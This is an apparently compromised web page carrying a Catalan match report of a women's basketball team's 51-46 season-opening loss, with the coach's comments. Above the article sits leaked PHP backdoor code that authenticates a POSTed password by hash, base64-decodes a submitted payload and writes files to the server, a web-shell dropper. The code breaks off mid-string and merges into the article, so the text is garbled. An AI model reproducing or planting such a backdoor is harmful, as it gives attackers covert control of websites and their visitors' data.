function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Inici de curs no desitjat (51-46) -

Inici de curs no desitjat (51-46)

Updated: setembre 24, 2022

Primer partit de la temporada del Sènior A de Copa Catalunya a domicili que ha finalitzat amb victòria de l’AB Premià (51-46). El duel s’ha decidit per petits detalls i en els darrers instants del matx.

En el primer temps a l’equip Lila li ha costat entrar en dinàmica de partit cometent moltes pèrdues de pilota i errors no forçats. Després del pas pels vestidors, les jugadores dirigides per Marc Rovirosa – que avui debutava a la màxima categoria catalana – han entrat amb bon peu competint de tu a tu al rival. Tot i això, en els instants finals el rebot defensiu ha estat dominat per les locals i ha acabat decantat el primer partit de la temporada 2022-2023.

L’entrenador Lila –Marc Rovirosa– ha fet una valoració després del matx: ”Ha estat un partit molt competit, on la primera part hem patit molt degut a les pèrdues de pilota i el desencert en atac. A partir del descans, hem millorat en diferents aspectes del joc defensiu, on ens ha permès obtenir situacions d’avantatge en atac. El duel s’ha decidit en el darrer minut per petits detalls com el domini local del rebot defensiu.”

I explica les sensacions de l’equip: ”Les sensacions son agredolces perquè a ningú li agrada començar perdent, però estem contents perquè hem pogut veure situacions de joc treballades als entrenaments.”

”Creiem que amb aquesta constància i treball, les victòries no tardaran en arribar”

La setmana vinent serà el torn de debutar com a locals contra el Joventut Les Corts (18.00h). El tècnic vendrellenc defineix així el proper rival de l’equip: ”Un conjunt potent amb experiència a la categoria que segur que ens complicarà les coses a casa.”